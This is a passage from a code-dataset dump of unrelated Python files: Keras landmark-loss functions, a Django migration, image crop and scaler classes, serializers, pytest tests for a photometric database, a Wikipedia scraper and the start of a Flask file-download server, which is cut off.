print('============')\n\n        loss_array = np.array(loss_array)\n        tensor_distance_loss = K.variable(loss_array)\n\n        # tensor_total_loss = tf.reduce_mean([tensor_mean_square_error, loss_array])\n        tensor_total_loss = tf.add(tensor_mean_square_error, tensor_distance_loss)\n        return tensor_total_loss\n\n    def __inceptionLoss_1(self, yTrue, yPred):\n        return self.__soft_MSE(yTrue, yPred, 20)\n\n    def __inceptionLoss_2(self, yTrue, yPred):\n        return self.__soft_MSE(yTrue, yPred, 10)\n\n    def __inceptionLoss_3(self, yTrue, 
yPred):\n        return self.__soft_MSE(yTrue, yPred, 5)\n\n    def __soft_MSE(self, yTrue, yPred, boundary_count, radius=0.01):\n        yTrue_vector_batch = K.eval(yTrue)\n        yPred_vector_batch = K.eval(yPred)\n\n        out_batch_vector = []  # 50 *136\n        for i in range(LearningConfig.batch_size):\n            out_vector = []  # 136\n            # compare every output component of sample i (e.g. the 136 landmark values)\n            for j in range(yTrue_vector_batch.shape[1]):\n                if abs(yTrue_vector_batch[i, j] - yPred_vector_batch[i, j]) <= boundary_count * radius:\n                    out_vector.append(0)\n                else:\n                    out_vector.append(1)\n            out_batch_vector.append(out_vector)\n\n        out_batch_vector = np.array(out_batch_vector)\n        out_batch_tensor = K.variable(out_batch_vector)\n\n        tensor_mean_square_error = K.mean(K.square(yPred - yTrue), axis=-1)\n        tmp_mul = tf.multiply(tensor_mean_square_error, out_batch_tensor)\n        return tmp_mul\n\n    def __ASM(self, input_tensor, pca_postfix):\n        print(pca_postfix)\n        pca_utility = PCAUtility()\n        image_utility = ImageUtility()\n        eigenvalues, eigenvectors, meanvector = pca_utility.load_pca_obj(DatasetName.ibug, pca_postfix=pca_postfix)\n\n        input_vector_batch = K.eval(input_tensor)\n        out_asm_vector = []\n        for i in range(LearningConfig.batch_size):\n            b_vector_p = self.calculate_b_vector(input_vector_batch[i], True, eigenvalues, eigenvectors, meanvector)\n            # asm_vector = meanvector + np.dot(eigenvectors, b_vector_p)\n            #\n            # labels_predict_transformed, landmark_arr_x_p, landmark_arr_y_p = \\\n            #     image_utility.create_landmarks_from_normalized(asm_vector, 224, 224, 112, 112)\n            # imgpr.print_image_arr(i + 1, np.zeros(shape=[224,224,3]), landmark_arr_x_p, landmark_arr_y_p)\n\n            out_asm_vector.append(meanvector + np.dot(eigenvectors, b_vector_p))\n\n        out_asm_vector = np.array(out_asm_vector)\n\n        tensor_out = K.variable(out_asm_vector)\n        return tensor_out\n\n    def __customLoss(self, yTrue, yPred):\n        pca_utility = PCAUtility()\n        eigenvalues, eigenvectors, meanvector = pca_utility.load_pca_obj(DatasetName.ibug)\n\n        # yTrue = tf.constant([[1.0, 2.0, 3.0], [5.0, 4.0, 7.0]])\n        # yPred = tf.constant([[2.0, 5.0, 6.0], [7.0, 3.0, 8.0]])\n        # session = K.get_session()\n        bias = 1\n        tensor_mean_square_error = K.log((K.mean(K.square(yPred - yTrue), axis=-1) + bias))\n        mse = K.eval(tensor_mean_square_error)\n        # print(\"mse:\")\n        # print(mse)\n        # print(\"---->>>\")\n\n        yPred_arr = K.eval(yPred)\n        yTrue_arr = K.eval(yTrue)\n\n        loss_array = []\n\n        for i in range(LearningConfig.batch_size):\n            asm_loss = 0\n\n            truth_vector = yTrue_arr[i]\n            predicted_vector = yPred_arr[i]\n\n            b_vector_p = self.calculate_b_vector(predicted_vector, True, eigenvalues, eigenvectors, meanvector)\n            y_pre_asm = meanvector + np.dot(eigenvectors, b_vector_p)\n\n            for j in range(len(y_pre_asm)):\n                asm_loss += (truth_vector[j] - y_pre_asm[j]) ** 2\n            asm_loss /= len(y_pre_asm)\n\n            asm_loss += bias + 1\n            asm_loss = math.log(asm_loss, 10)\n            asm_loss *= LearningConfig.regularization_term\n            loss_array.append(asm_loss)\n            print('mse[i]' + str(mse[i]))\n            print('asm_loss[i]' + str(asm_loss))\n            print('============')\n\n        loss_array = np.array(loss_array)\n\n        tensor_asm_loss = K.variable(loss_array)\n        tensor_total_loss = tf.reduce_mean([tensor_mean_square_error, tensor_asm_loss], axis=0)\n\n        return tensor_total_loss\n\n    def __customLoss_base(self, yTrue, yPred):\n        pca_utility = PCAUtility()\n        image_utility = ImageUtility()\n        tf_record_utility = TFRecordUtility()\n\n        eigenvalues, eigenvectors, meanvector = pca_utility.load_pca_obj(DatasetName.ibug)\n\n        # yTrue = tf.constant([[1.0, 2.0, 3.0], [5.0, 4.0, 7.0]])\n        # yPred = tf.constant([[9.0, 1.0, 2.0], [7.0, 3.0, 8.0]])\n        # session = 
K.get_session()\n\n        tensor_mean_square_error = K.mean(K.square(yPred - yTrue), axis=-1)\n        # tensor_mean_square_error = keras.losses.mean_squared_error(yPred, yTrue)\n        mse = K.eval(tensor_mean_square_error)\n\n        yPred_arr = K.eval(yPred)\n        yTrue_arr = K.eval(yTrue)\n\n        loss_array = []\n\n        for i in range(LearningConfig.batch_size):\n            asm_loss = 0\n\n            truth_vector = yTrue_arr[i]\n            predicted_vector = yPred_arr[i]\n\n            b_vector_p = self.calculate_b_vector(predicted_vector, True, eigenvalues, eigenvectors, meanvector)\n            y_pre_asm = meanvector + np.dot(eigenvectors, b_vector_p)\n\n            \"\"\"in order to test the results after PCA, you can use these lines of code\"\"\"\n            # landmark_arr_xy, landmark_arr_x, landmark_arr_y = image_utility.create_landmarks_from_normalized(truth_vector, 224, 224, 112, 112)\n            # image_utility.print_image_arr(i, np.ones([224, 224]), landmark_arr_x, landmark_arr_y)\n            #\n            # landmark_arr_xy_new, landmark_arr_x_new, landmark_arr_y_new= image_utility.create_landmarks_from_normalized(y_pre_asm, 224, 224, 112, 112)\n            # image_utility.print_image_arr(i*100, np.ones([224, 224]), landmark_arr_x_new, landmark_arr_y_new)\n\n            for j in range(len(y_pre_asm)):\n                asm_loss += (truth_vector[j] - y_pre_asm[j]) ** 2\n            asm_loss /= len(y_pre_asm)\n\n            # asm_loss *= mse[i]\n            # asm_loss *= LearningConfig.regularization_term\n\n            loss_array.append(asm_loss)\n\n            print('mse[i]' + str(mse[i]))\n            print('asm_loss[i]' + str(asm_loss))\n            print('============')\n\n        loss_array = np.array(loss_array)\n        tensor_asm_loss = K.variable(loss_array)\n\n        # sum_loss_tensor = tf.add(tensor_mean_square_error, tensor_asm_loss)\n        tensor_total_loss = tf.reduce_mean([tensor_mean_square_error, tensor_asm_loss], axis=0)\n\n        # sum_loss = np.array(K.eval(tensor_asm_loss))\n        # print(mse)\n        # print(K.eval(tensor_mean_square_error))\n        # print(K.eval(tensor_asm_loss))\n        # print('asm_loss ' + str(loss_array[0]))\n        # print('mse_loss ' + str(mse[0]))\n        # print('sum_loss ' + str(sum_loss[0]))\n        # print('total_loss ' + str(total_loss[0]))\n        # print(' ')\n        return tensor_total_loss\n\n    def custom_teacher_student_loss_cos(self, lnd_img_map, img_path, teacher_models, teachers_weight_loss, bath_size,\n                                        num_points, cos_weight):\n        def loss(y_true, y_pred):\n            # CosineSimilarity is the callable loss class; cosine_similarity is a plain function\n            cosine_loss = tf.keras.losses.CosineSimilarity(axis=1)\n            image_utility = ImageUtility()\n\n            t0_model = teacher_models[0]\n            l0_weight = teachers_weight_loss[0]\n\n            t1_model = teacher_models[1]\n            l1_weight = teachers_weight_loss[1]\n\n            y_true_n = tf.reshape(y_true, [bath_size, num_points], name=None)\n            imgs_address = self.get_y(y_true_n, lnd_img_map, img_path)\n            imgs_batch = [np.array(Image.open(img_file)) / 255.0 for img_file in imgs_address]\n\n            y_pred_T0 = np.array([t0_model.predict(np.expand_dims(img, axis=0))[0] for img in imgs_batch])\n            y_pred_T1 = np.array([t1_model.predict(np.expand_dims(img, axis=0))[0] for img in imgs_batch])\n\n            '''test teacher Nets'''\n            # counter = 0\n            # for pre_points in y_pred_T1:\n            #     labels_predict_transformed, landmark_arr_x_p, landmark_arr_y_p = \\\n            #         image_utility.create_landmarks_from_normalized(pre_points, 224, 224, 112, 112)\n            #     imgpr.print_image_arr((counter + 1) * 1000, imgs_batch[counter], landmark_arr_x_p, landmark_arr_y_p)\n            #     counter += 1\n\n            y_pred_T0_ten = K.variable(y_pred_T0)\n            y_pred_T1_ten = K.variable(y_pred_T1)\n\n            mse_te0 = K.mean(K.square(y_pred_T0_ten - y_true))\n            mse_te0_cos = cosine_loss(y_pred_T0_ten, y_true)\n\n            mse_te1 = K.mean(K.square(y_pred_T1_ten - y_true))\n            mse_te1_cos = cosine_loss(y_pred_T1_ten, y_true)\n\n            mse_main = 
K.mean(K.square(y_pred - y_true))\n mse_main_cos = cosine_loss(y_pred, y_true)\n\n return (mse_main + cos_weight * mse_main_cos) \\\n + l0_weight * (mse_te0 + cos_weight * mse_te0_cos) \\\n + l1_weight * (mse_te1 + cos_weight * mse_te1_cos)\n\n return loss\n\n def init_tensors(self, test):\n batchsize = LearningConfig.batch_size\n if test:\n batchsize = 1\n\n pca_utility = PCAUtility()\n eigenvalues, eigenvectors, meanvector = pca_utility.load_pca_obj(DatasetName.ibug, )\n\n # print(\"predicted_tensor \" + str(predicted_tensor.shape))\n # print(\"meanvector \" + str(meanvector.shape))\n # print(\"eigenvalues \" + str(eigenvalues.shape))\n # print(\"eigenvectors \" + str(eigenvectors.shape))\n # print(\"-\")\n\n self._meanvector_arr = np.tile(meanvector, (batchsize, 1))\n # meanvector_arr = np.tile(meanvector[None, :, None], (LearningConfig.batch_size, 1, 1))\n # print(\"meanvector_arr\" + str(meanvector_arr.shape))\n\n self._eigenvalues_arr = np.tile(eigenvalues, (batchsize, 1))\n # eigenvalues_arr = np.tile(eigenvalues[None, :, None], (LearningConfig.batch_size, 1, 1))\n # print(\"eigenvalues_arr\" + str(eigenvalues_arr.shape))\n\n self._eigenvectors_arr = np.tile(eigenvectors[None, :, :], (batchsize, 1, 1))\n # print(\"eigenvectors_arr\" + str(eigenvectors_arr.shape))\n\n self._meanvector_tensor = tf.convert_to_tensor(self._meanvector_arr, dtype=tf.float32)\n self._eigenvalues_tensor = tf.convert_to_tensor(self._eigenvalues_arr, dtype=tf.float32)\n self._eigenvectors_tensor = tf.convert_to_tensor(self._eigenvectors_arr, dtype=tf.float32)\n\n self._eigenvectors_T = tf.transpose(self._eigenvectors_tensor, perm=[0, 2, 1])\n print(\"\")\n\n def custom_activation(self, predicted_tensor):\n pca_utility = PCAUtility()\n eigenvalues, eigenvectors, meanvector = pca_utility.load_pca_obj(DatasetName.ibug)\n\n b_vector_tensor = self.calculate_b_vector_tensor(predicted_tensor, True, eigenvalues,\n self._eigenvectors_tensor, self._meanvector_tensor)\n\n out = tf.add(tf.expand_dims(self._meanvector_tensor, 2), tf.matmul(self._eigenvectors_tensor, b_vector_tensor))\n out = tf.reshape(out, [LearningConfig.batch_size, 136])\n\n return out\n\n def calculate_b_vector_tensor(self, predicted_tensor, correction, eigenvalues, eigenvectors, mean_tensor):\n tmp1 = tf.expand_dims(tf.subtract(predicted_tensor, mean_tensor), 2)\n\n b_vector_tensor = tf.matmul(self._eigenvectors_T, tmp1) # (50, 50, 1)\n\n return b_vector_tensor\n\n b_vector = np.squeeze(K.eval(b_vector_tensor), axis=2)[0]\n print(\"b_vector -> \" + str(b_vector.shape)) # (50,)\n\n mul_arr = np.ones(b_vector.shape)\n add_arr = np.zeros(b_vector.shape)\n\n # put b in -3lambda =>\n if correction:\n i = 0\n for b_item in b_vector:\n lambda_i_sqr = 3 * math.sqrt(eigenvalues[i])\n\n if b_item > 0:\n if b_item > lambda_i_sqr:\n mul_arr[i] = 0.0\n add_arr[i] = lambda_i_sqr\n b_item = min(b_item, lambda_i_sqr)\n else:\n if b_item < -1 * lambda_i_sqr:\n mul_arr[i] = 0.0\n add_arr[i] = lambda_i_sqr\n b_item = max(b_item, -1 * lambda_i_sqr)\n\n b_vector[i] = b_item\n i += 1\n\n mul_arr = np.tile(mul_arr, (LearningConfig.batch_size, 1))\n add_arr = np.tile(add_arr, (LearningConfig.batch_size, 1))\n\n # print(mul_arr)\n # print(add_arr)\n\n mul_tensor = tf.expand_dims(tf.convert_to_tensor(mul_arr, dtype=tf.float32), 2)\n add_arr = tf.expand_dims(tf.convert_to_tensor(add_arr, dtype=tf.float32), 2)\n\n # print(\"mul_tensor -> \" + str(mul_tensor.shape)) # (50, 50, 1)\n # print(\"add_arr -> \" + str(add_arr.shape)) # (50, 50, 1)\n\n tmp_mul = 
tf.multiply(b_vector_tensor, mul_tensor)\n tmp_add = tf.add(tmp_mul, add_arr)\n\n # print(\"add_arr -> \" + str(add_arr.shape)) # (50, 50, 1)\n\n return tmp_add\n\n def custom_activation_test(self, predicted_tensor):\n pca_utility = PCAUtility()\n eigenvalues, eigenvectors, meanvector = pca_utility.load_pca_obj(DatasetName.ibug)\n\n b_vector_tensor = self.calculate_b_vector_tensor_test(predicted_tensor, True, eigenvalues,\n self._eigenvectors_tensor, self._meanvector_tensor)\n\n out = tf.add(tf.expand_dims(self._meanvector_tensor, 2), tf.matmul(self._eigenvectors_tensor, b_vector_tensor))\n out = tf.reshape(out, [1, 136])\n\n return out\n\n def calculate_b_vector_tensor_test(self, predicted_tensor, correction, eigenvalues, eigenvectors, mean_tensor):\n\n # print(\"predicted_tensor -> \" + str(predicted_tensor.shape)) # (50,)\n # print(\"eigenvalues -> \" + str(eigenvalues.shape)) # (50,)\n # print(\"eigenvectors -> \" + str(eigenvectors.shape)) # (50,)\n # print(\"mean_tensor -> \" + str(mean_tensor.shape)) # (50,)\n\n tmp1 = tf.expand_dims(tf.subtract(predicted_tensor, mean_tensor), 2)\n # print(\"tmp1 -> \" + str(tmp1.shape)) # (50,)\n\n b_vector_tensor = tf.matmul(self._eigenvectors_T, tmp1) # (50, 50, 1)\n print(\"b_vector_tensor -> \" + str(b_vector_tensor.shape)) # (50,)\n return b_vector_tensor\n\n # inputs = K.placeholder(shape=(None, 224, 224, 3))\n #\n # sess = K.get_session()\n # tmp22 = sess.run(inputs)\n # tmp22 = K.get_value(b_vector_tensor)\n\n tmp22 = K.eval(b_vector_tensor)\n\n # holder = tf.placeholder(tf.float32, shape=(None, 224,224,3))\n # with tf.Session() as sess:\n # sess.run(tf.global_variables_initializer())\n # print(\"12\")\n # tmp22 = sess.run([b_vector_tensor], feed_dict=holder)\n # b_vector_tensor.eval(feed_dict=holder)\n\n print(\"tmp22 -> \" + str(tmp22.shape))\n b_vector = np.squeeze(K.eval(b_vector_tensor), axis=2)\n print(\"b_vector -> \" + str(b_vector.shape)) # (50,)\n\n mul_arr = np.ones(b_vector.shape)\n add_arr = np.zeros(b_vector.shape)\n\n # put b in -3lambda =>\n if correction:\n i = 0\n for b_item in b_vector:\n lambda_i_sqr = 3 * math.sqrt(eigenvalues[i])\n\n if b_item > 0:\n if b_item > lambda_i_sqr:\n mul_arr[i] = 0.0\n add_arr[i] = lambda_i_sqr\n b_item = min(b_item, lambda_i_sqr)\n else:\n if b_item < -1 * lambda_i_sqr:\n mul_arr[i] = 0.0\n add_arr[i] = lambda_i_sqr\n b_item = max(b_item, -1 * lambda_i_sqr)\n\n b_vector[i] = b_item\n i += 1\n\n mul_arr = np.tile(mul_arr, (1, 1))\n add_arr = np.tile(add_arr, (1, 1))\n\n # print(mul_arr)\n # print(add_arr)\n\n mul_tensor = tf.expand_dims(tf.convert_to_tensor(mul_arr, dtype=tf.float32), 2)\n add_arr = tf.expand_dims(tf.convert_to_tensor(add_arr, dtype=tf.float32), 2)\n\n # print(\"mul_tensor -> \" + str(mul_tensor.shape)) # (50, 50, 1)\n # print(\"add_arr -> \" + str(add_arr.shape)) # (50, 50, 1)\n\n tmp_mul = tf.multiply(b_vector_tensor, mul_tensor)\n tmp_add = tf.add(tmp_mul, add_arr)\n\n print(\"tmp_add -> \" + str(tmp_add.shape)) # (50, 50, 1)\n\n return tmp_add\n\n def calculate_b_vector(self, predicted_vector, correction, eigenvalues, eigenvectors, meanvector):\n tmp1 = predicted_vector - meanvector\n b_vector = np.dot(eigenvectors.T, tmp1)\n\n # put b in -3lambda =>\n if correction:\n i = 0\n for b_item in b_vector:\n lambda_i_sqr = 3 * math.sqrt(eigenvalues[i])\n\n if b_item > 0:\n b_item = min(b_item, lambda_i_sqr)\n else:\n b_item = max(b_item, -1 * lambda_i_sqr)\n b_vector[i] = b_item\n i += 1\n\n return b_vector\n\n def __reorder(self, input_arr):\n out_arr = []\n for i in 
range(68):\n out_arr.append(input_arr[i])\n k = 68 + i\n out_arr.append(input_arr[k])\n return np.array(out_arr)\n\n def test_pca_validity(self, pca_postfix):\n cnn_model = CNNModel()\n pca_utility = PCAUtility()\n tf_record_utility = TFRecordUtility()\n image_utility = ImageUtility()\n\n eigenvalues, eigenvectors, meanvector = pca_utility.load_pca_obj(dataset_name=DatasetName.ibug,\n pca_postfix=pca_postfix)\n\n lbl_arr, img_arr, pose_arr = tf_record_utility.retrieve_tf_record(tfrecord_filename=IbugConf.tf_train_path,\n number_of_records=30, only_label=False)\n for i in range(20):\n b_vector_p = self.calculate_b_vector(lbl_arr[i], True, eigenvalues, eigenvectors, meanvector)\n lbl_new = meanvector + np.dot(eigenvectors, b_vector_p)\n\n labels_true_transformed, landmark_arr_x_t, landmark_arr_y_t = image_utility. \\\n create_landmarks_from_normalized(lbl_arr[i], 224, 224, 112, 112)\n\n labels_true_transformed_pca, landmark_arr_x_pca, landmark_arr_y_pca = image_utility. \\\n create_landmarks_from_normalized(lbl_new, 224, 224, 112, 112)\n\n image_utility.print_image_arr(i, img_arr[i], landmark_arr_x_t, landmark_arr_y_t)\n image_utility.print_image_arr(i * 1000, img_arr[i], landmark_arr_x_pca, landmark_arr_y_pca)\n\n _meanvector_arr = []\n _eigenvalues_arr = []\n _eigenvectors_arr = []\n _meanvector_tensor = None\n _eigenvalues_tensor = None\n _eigenvectors_tensor = None\n _eigenvectors_T = None\n","sub_path":"custom_Losses.py","file_name":"custom_Losses.py","file_ext":"py","file_size_in_byte":39624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"260023368","text":"import functions.arithmetic_functions as afun\nimport functions.polynomial_functions as pfun\nimport functions.exponential_functions as efun\n\nx = 2.0\ny = 5.0\n\n# Test arithmetic functions\nu = afun.addition(x,y)\nprint(u)\n\n# Test polynomial functions\nv = pfun.poly(y,2)\nprint(v)\n\n# Test exponential functions\nw = efun.exponential(x)\nprint(w)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"442043045","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Bulto',\n fields=[\n ('id', models.AutoField(serialize=False, verbose_name='ID', primary_key=True, auto_created=True)),\n ('ancho', models.IntegerField()),\n ('largo', models.IntegerField()),\n ('alto', models.IntegerField()),\n ('punto', models.IntegerField()),\n ],\n options={\n 'verbose_name': 'Bulto',\n 'verbose_name_plural': 'Bultos',\n },\n ),\n ]\n","sub_path":"bulto/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"207168950","text":"import numpy as np\nimport cv2\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nfrom ctypes import *\nimport platform\nimport isp_config\nfrom skimage import data, color\nfrom skimage.transform import rescale, resize, downscale_local_mean\n\nclass Crop(object):\n def __init__(self, cfg):\n self.cfg = cfg\n\n def run(self, bgr):\n x = self.cfg.outCropLeft\n y = self.cfg.outCropTop\n w = self.cfg.outCropWidth\n h = self.cfg.outCropHeight\n if (x < 0) or (w > bgr.shape[1]):\n x = 0\n if (y < 0) or (h > 
bgr.shape[0]):\n y = 0\n if (w < 0) or (w > bgr.shape[1]):\n w = bgr.shape[1]\n if (h < 0) or (h > bgr.shape[0]):\n h = bgr.shape[0]\n return bgr[y:y+h, x:x+w, 0:3]\n\nclass Scaler(object):\n def __init__(self, cfg):\n self.cfg = cfg\n\n def run(self, bgr):\n w = self.cfg.outScalerWidth\n h = self.cfg.outScalerHeight\n if (w == -1):\n w = bgr.shape[1]\n if (h == -1):\n h = bgr.shape[0]\n if (w != bgr.shape[1]) or (h != bgr.shape[0]):\n raise NotImplementedError('not implemented yet')\n\n return bgr\n \n","sub_path":"isp_output.py","file_name":"isp_output.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"257161320","text":"import datetime\nfrom core.utils.serialize import (\n Serializer,\n Field,\n IntField,\n DateField,\n FileField\n)\nfrom .models import Affectation\n\n\nclass TypeMaterielSerializer(Serializer):\n id = IntField()\n label = Field()\n observations = Field()\n\n\nclass AffectationSerializer(Serializer):\n id = IntField()\n id_materiel = IntField()\n type_affectation = IntField()\n utilisateur = Field()\n date_affectation = DateField(default=datetime.datetime.now())\n date_retour = DateField()\n observations = Field()\n\n\nclass MaterielSerializer(Serializer):\n id = IntField()\n type_mat = IntField(preparefn=lambda x: x['id'])\n label = Field()\n reference = Field()\n disponible = IntField()\n utilisateur_actuel = Field()\n\n\nclass MaterielFullSerializer(MaterielSerializer):\n observations = Field()\n date_entree = DateField(default=datetime.datetime.now())\n date_exclusion = DateField()\n etat = Field()\n '''\n affectations = Field(\n preparefn=lambda x: [AffectationSerializer(Affectation).load(o) for o in x],\n serializefn=lambda x: [AffectationSerializer(o).dump() for o in x] if x else []\n )\n '''\n","sub_path":"modules/materiel/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"103452092","text":"\n\nfrom xai.brain.wordbase.verbs._badger import _BADGER\n\n#calss header\nclass _BADGERS(_BADGER, ):\n\tdef __init__(self,): \n\t\t_BADGER.__init__(self)\n\t\tself.name = \"BADGERS\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"badger\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_badgers.py","file_name":"_badgers.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"621635136","text":"\"\"\"Tests for the FfiToiDatabase class.\"\"\"\nfrom pathlib import Path\nfrom typing import Tuple\nfrom unittest.mock import patch, Mock\nimport numpy as np\nimport pytest\n\nimport ramjet.photometric_database.ffi_toi_database\nfrom ramjet.photometric_database.ffi_toi_database import FfiToiDatabase\n\n\nclass TestFfiToiDatabase:\n \"\"\"Tests for the FfiToiDatabase class.\"\"\"\n\n @pytest.fixture\n def database(self) -> FfiToiDatabase:\n \"\"\"\n Sets up the database for use in a test.\n\n :return: The database.\n \"\"\"\n return FfiToiDatabase()\n\n @pytest.fixture\n def ffi_pickle_contents(self) -> Tuple[int, float, float, float,\n np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray]:\n \"\"\"\n Creates a mock contents of one of Brian's FFI data files.\n\n :return: TIC ID, right ascension, declination, TESS magnitude,\n time, raw flux, corrected flux, PCA flux, flux error.\n \"\"\"\n tic_id = 231663901\n ra = 62.2\n dec = -71.4\n 
tess_magnitude = 10\n        time = np.arange(0, 100, 10)\n        raw_flux = np.arange(10)\n        corrected_flux = np.arange(10, 20)\n        pca_flux = np.arange(20, 30)\n        flux_error = np.arange(0, 1, 0.1)\n        return tic_id, ra, dec, tess_magnitude, time, raw_flux, corrected_flux, pca_flux, flux_error\n\n    def test_can_create_synthetic_signal_from_real_data(self, database):\n        fluxes = np.array([100, 100, 90, 110, 100, 100])\n        times = np.array([100, 110, 120, 130, 140, 150])\n        synthetic_magnifications, synthetic_times = database.generate_synthetic_signal_from_real_data(fluxes, times)\n        assert np.array_equal(synthetic_magnifications, [1, 1, 0.9, 1.1, 1, 1])\n        assert np.array_equal(synthetic_times, [0, 10, 20, 30, 40, 50])\n\n    @patch.object(ramjet.photometric_database.ffi_toi_database.TessFfiDataInterface,\n                  'load_fluxes_and_times_from_pickle_file')\n    def test_lightcurve_loading_loads_ffi_data_from_pickle(self, mock_load_fluxes_and_times_from_pickle_file, database,\n                                                           ffi_pickle_contents):\n        file_fluxes = ffi_pickle_contents[6]\n        file_times = ffi_pickle_contents[4]\n        file_lightcurve = file_fluxes, file_times\n        mock_load_fluxes_and_times_from_pickle_file.return_value = file_lightcurve\n        fake_file_path = 'fake_path.pkl'\n        fluxes, times = database.load_fluxes_and_times_from_lightcurve_path(fake_file_path)\n        assert np.array_equal(fluxes, ffi_pickle_contents[6])\n        assert np.array_equal(times, ffi_pickle_contents[4])\n\n    def test_synthetic_signal_loading_loads_real_toi_lightcurve_as_synthetic(self, database):\n        file_fluxes = np.array([100, 100, 90, 110, 100, 100])\n        file_times = np.array([100, 110, 120, 130, 140, 150])\n        file_lightcurve = file_fluxes, file_times\n        database.tess_data_interface.load_fluxes_and_times_from_fits_file = Mock(return_value=file_lightcurve)\n        fake_file_path = 'fake_path.fits'\n        magnifications, times = database.load_magnifications_and_times_from_synthetic_signal_path(fake_file_path)\n        assert np.array_equal(magnifications, [1, 1, 0.9, 1.1, 1, 1])\n        assert np.array_equal(times, [0, 10, 20, 30, 40, 50])\n\n    def test_injecting_out_of_bounds_is_enabled_by_default(self, database):\n        lightcurve_fluxes = np.array([1, 2, 3, 4, 5, 3])\n        lightcurve_times = np.array([10, 20, 30, 40, 50, 60])\n        signal_magnifications = np.array([1, 3, 1])\n        signal_times = np.array([0, 20, 40])\n        fluxes_with_injected_signal = database.inject_signal_into_lightcurve(lightcurve_fluxes, lightcurve_times,\n                                                                             signal_magnifications, signal_times)\n        assert np.array_equal(fluxes_with_injected_signal, np.array([1, 5, 9, 7, 5, 3]))","sub_path":"tests/photometric_database/test_ffi_toi_database.py","file_name":"test_ffi_toi_database.py","file_ext":"py","file_size_in_byte":3933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"536021138","text":"import sys\n\nimport requests as rq\nfrom itertools import groupby\nfrom bs4 import BeautifulSoup as BS\nimport re\n\ndef create_question(question,type):\n    try:\n        string = input(question.strip()+\" or type exit to stop the script: \")\n        if string==\"exit\":\n            sys.exit()\n        else:\n            return type(string)\n    except (TypeError, ValueError):\n        print(\"Error: the value entered is not valid\")\n        return create_question(question,type)\n\ndef get_link(topic):\n    link = \"https://ru.wikipedia.org/wiki/\" + topic.capitalize()\n    return link\n\ndef get_content(link):\n    return rq.get(link).text\n\ndef visualize_common_words(content,start=100,end=90):\n    try:\n        start = int(start)\n        end = int(end)\n    except (TypeError, ValueError):\n        print(\"Error: the range is not valid\")\n
    words_list = re.findall(\"[а-яА-Я\\-\\']{4,}\", content)\n    words_list.sort()\n    words = [ tuple([key,len(list(group))]) for key, group in groupby(words_list)]\n    words.sort(key=lambda t: t[1],reverse = True)\n    # slice between the two rank bounds, whichever order they are given in\n    for w in words[start if start < end else end:end if end > start else start]:\n        print(w[0])\n\n\ndef get_wiki_sub_links(s):\n    bs = BS(s,\"html.parser\")\n    div = bs.find(id=\"mw-content-text\")\n\n    # links are searched only in the main content, otherwise the result is a mess\n    # we do not need all of them, take only the first 5\n    return [i[\"href\"] for i in div.findChildren(href=re.compile(\"/wiki/%.*\")) if not i.get(\"class\",[])][:5]\n\ndef get_topic(link,pattern):\n    return pattern.findall(link)[0]\n\n\n\nlinks = []\n\npattern = re.compile(\"/wiki/(%.*)\")\nfor l in get_wiki_sub_links(get_content(get_link(create_question(\"enter the search topic\",str)))):\n    links.append(l)\n    [links.append(i) for i in get_wiki_sub_links(get_content(get_link(get_topic(l,pattern))))]\n\nprint(\"\")\nprint(\"_\"*100)\nprint(\"not sure what the resulting list should ultimately contain, so it consists of the 5 links of the searched page and five links from each of the pages they lead to\")\nprint(\"\")\nprint(\"\\n\".join(links))\n","sub_path":"python/middle/hw_4.py","file_name":"hw_4.py","file_ext":"py","file_size_in_byte":2363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"58291719","text":"\"\"\"\n\"\"\"\nimport json\nimport re\nimport logging\nfrom flask import Flask, request, Response\nimport time\nimport importlib\nimport os\n\n#pkg_it = importlib.import_module(\"package-it\")\n\nLOG_FILE = '/data/logs/pubmin/pub-server.log'\n\nlogging.basicConfig(filename=LOG_FILE, format='%(asctime)s - %(levelname)s - %(message)s', level=logging.INFO)\n\napp = Flask(__name__)\n\n#@app.after_request\ndef add_cors(response):\n    response.headers['Access-Control-Allow-Origin'] = '*'\n    response.headers['X-Authenticate-As'] = 'fal3rq3'\n    return response\n\n@app.route('/')\ndef index():\n    msg = {\"message\": \"index\"}\n    return Response(json.dumps(msg), status=200, mimetype=\"application/json\")\n\n@app.route('/text')\ndef text():\n    msg = \"teksti\"\n    return Response(msg, status=200, mimetype=\"text/plain\")\n\n@app.route('/register', methods=['POST'])\ndef register():\n    data = request.get_json()\n    return Response(json.dumps(data), status=200, mimetype=\"application/json\")\n\n@app.route('/sample/<nid>', methods=['GET'])\ndef download_sample(nid):\n    s = time.time()\n    logging.info('id {} start.'.format(nid))\n    book = '/data/books/samples/{}.sample.epub'.format(nid)\n    headers = {}\n    headers['X-Accel-Redirect'] = book\n    headers['Content-Disposition'] = 'attachment; filename=\\\"{}\\\"'.format(os.path.basename(book))\n    logging.info(\"book {} end. 
